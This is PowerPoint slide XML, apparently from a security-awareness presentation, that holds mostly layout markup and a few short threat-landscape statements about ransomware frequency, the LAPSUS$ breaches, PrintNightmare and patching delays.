                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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494949"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" altLang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>80 % of all ransomware aimed at end-users</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Tahoma"/>
              <a:ea typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F9A3FA2-02E0-43CD-8AC0-6B9BF8CE9AC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1012438" y="3255245"/>
            <a:ext cx="2340000" cy="1080000"/>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Clr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0" kern="1200" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1100" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="538163" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="538163" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="198000" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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494949"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" altLang="en-US" sz="16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$LAPSUS «hacked» Samsung, NVIDIA, Microsoft og Okta</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Tahoma"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12311BE9-ABDC-487A-B254-B8243AF42FB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9181492" y="1764579"/>
            <a:ext cx="2340000" cy="1080000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0" kern="1200" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1100" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="538163" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="538163" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="198000" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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494949"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" altLang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Ransomware attack «attempts» every 11 seconds</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Tahoma"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE561EE0-1FB7-4673-A34E-F0C457777434}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9218701" y="3127283"/>
            <a:ext cx="2340000" cy="1080000"/>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Clr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0" kern="1200" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1100" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="538163" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="538163" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="198000" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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494949"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" altLang="en-US" sz="16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Crititical Vulnerabilities slike PrintNightmare, new RPC CVE and browsers (w/Extensions)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Tahoma"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B6C34E4-0A54-4324-A60D-C0565777B745}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9184955" y="4898620"/>
            <a:ext cx="2340000" cy="1080000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0" kern="1200" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1100" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="538163" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="538163" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="198000" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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494949"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="16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On average 30 – 60 days to patch in an organization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Groupe 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB6A03B9-54AD-4173-A86B-30853780E29A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5534266" y="5335299"/>
            <a:ext cx="1031919" cy="608832"/>
            <a:chOff x="5470258" y="5467556"/>
            <a:chExt cx="1031919" cy="608832"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent5"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Line 93">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{174E2701-190D-42D0-B807-A5DF3A7B20E8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5986217" y="5741015"/>
              <a:ext cx="0" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>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Tahoma"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Line 94">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9071105C-E5D4-46DE-A25D-815AA6FB3702}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5986217" y="5741015"/>
              <a:ext cx="0" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>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Tahoma"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Line 95">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1EFF307-3954-4357-BBEC-E54E4DF372D4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5986217" y="5761653"/>
              <a:ext cx="0" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>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Tahoma"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Line 96">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D31B3D20-3D96-414C-B32B-F68FDE7EC559}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5986217" y="5761653"/>
              <a:ext cx="0" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>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Tahoma"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Freeform 98">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{087BFBD4-F18E-4D87-A57C-988C24B453A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5532173" y="5467556"/>
              <a:ext cx="908089" cy="608832"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 144"/>
                <a:gd name="T1" fmla="*/ 0 h 97"/>
                <a:gd name="T2" fmla="*/ 0 w 144"/>
                <a:gd name="T3" fmla="*/ 2 h 97"/>
                <a:gd name="T4" fmla="*/ 0 w 144"/>
                <a:gd name="T5" fmla="*/ 22 h 97"/>
                <a:gd name="T6" fmla="*/ 0 w 144"/>
                <a:gd name="T7" fmla="*/ 24 h 97"/>
                <a:gd name="T8" fmla="*/ 0 w 144"/>
                <a:gd name="T9" fmla="*/ 44 h 97"/>
                <a:gd name="T10" fmla="*/ 1 w 144"/>
                <a:gd name="T11" fmla="*/ 44 h 97"/>
